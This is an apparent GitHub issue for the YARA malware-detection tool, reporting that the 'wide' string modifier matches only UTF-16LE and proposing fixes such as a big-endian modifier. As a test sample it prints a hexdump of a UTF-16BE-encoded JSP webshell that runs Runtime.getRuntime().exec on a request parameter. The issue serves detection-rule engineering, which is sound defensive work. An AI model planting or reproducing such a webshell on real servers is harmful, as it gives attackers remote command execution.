yara
yara copied to clipboard
wide strings match only UTF16-LE
Describe the bug
The example string "Borland" from https://yara.readthedocs.io/en/v4.2.3/writingrules.html#wide-character-strings is there encoded as B\x00o\x00r\x00l\x00a\x00n\x00d\x00
but that's just the LE version of UTF16 with BE being\x00B\x00o\x00r\x00l\x00a\x00n\x00d
(\x00 in front). So the example rule from the docs doesn't match UTF16-BE:
rule WideCharTextExample1
{
strings:
$wide_string = "Borland" wide
condition:
$wide_string
}
UTF16-LE is by far the most common case but I stumbled upon the string Qi Lijun
in UTF16-BE in
2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b
(however that happened ...)
(Actually this is more unexpected behavior than a bug but that fits better than a feature request.)
To Reproduce
rule WideCharTextExample1
{
strings:
$wide_string = "Qi Lijun" wide
condition:
$wide_string
}
Doesn't match:
$ yara test.yar 2fb7a38e69a88e3da8fece4c6a1a81842c1be6ae9d6ac299afa4aef4eb55fd4b
Expected behavior There would be several options to handle the problem:
-
Back to the
Borland
example, the perfect solution would be to search for both UTF16-LE and UTF16-BE.UTF16-LE: B\x00o\x00r\x00l\x00a\x00n\x00d\x00
UTF16-BE: \x00B\x00o\x00r\x00l\x00a\x00n\x00d
-
The faster and memory saving would be to strip the \x00 in the end of the existing implementation and search for:
B\x00o\x00r\x00l\x00a\x00n\x00d
That might hit wrong on very short strings (which shouldn't happen that often because of the performance and false positive problems).
-
Introduce e.g.
widebe
as a new string modifier, similar to uint16be. -
Explain the issue in the docs and recommend to use hex for UTF16-BE.
Please complete the following information:
- OS: Linux
- YARA version: 4.3.0
Additional context
This also affects string search on VT. This search doesn't show any results: content:"Qi Lijun" tag:peexe
This shows 10 hits: content:{00 51 00 69 00 20 00 4c 00 69 00 6a 00 75 00 6e}
(same string in hex(UTF16-BE) )
More precise: This isn't a problem if the string to be matched is in the middle of UTF16 file, because there a null bytes all around. It's only a problem to match at the transition between a multi byte to a single byte charset (like in the example above) or at the end of the file.
For example this string
$endtag = "%>" ascii wide
... wouldn't match on the UTF-16BE-encoded webshell below because it only searches for 25 00 3e 00
and 25 3e
.
$ hexdump UTF-16BE.jsp
00000000 3c 25 40 20 70 61 67 65 20 63 6f 6e 74 65 6e 74 |<%@ page content|
00000010 54 79 70 65 3d 22 63 68 61 72 73 65 74 3d 55 54 |Type="charset=UT|
00000020 46 2d 31 36 42 45 22 20 25 3e 00 3c 00 25 00 52 |F-16BE" %>.<.%.R|
00000030 00 75 00 6e 00 74 00 69 00 6d 00 65 00 2e 00 67 |.u.n.t.i.m.e...g|
00000040 00 65 00 74 00 52 00 75 00 6e 00 74 00 69 00 6d |.e.t.R.u.n.t.i.m|
00000050 00 65 00 28 00 29 00 2e 00 65 00 78 00 65 00 63 |.e.(.)...e.x.e.c|
00000060 00 28 00 72 00 65 00 71 00 75 00 65 00 73 00 74 |.(.r.e.q.u.e.s.t|
00000070 00 2e 00 67 00 65 00 74 00 50 00 61 00 72 00 61 |...g.e.t.P.a.r.a|
00000080 00 6d 00 65 00 74 00 65 00 72 00 28 00 22 00 69 |.m.e.t.e.r.(.".i|
00000090 00 22 00 29 00 29 00 3b 00 25 00 3e |.".).).;.%.>|
So the problem is rather low prio.
I'd like to +1 this issue.
The situation you're running into here is the programName value within the SpcSpOpusInfo details .
We have blogged about this in "I Solemnly Swear My Driver Is Up to No Good". Right now we have to UTF-16BE + Hex encode the string before adding it to yara rules. It would be very helpful for ease of reading the rule and also in rule creation to add a utf16be modifier.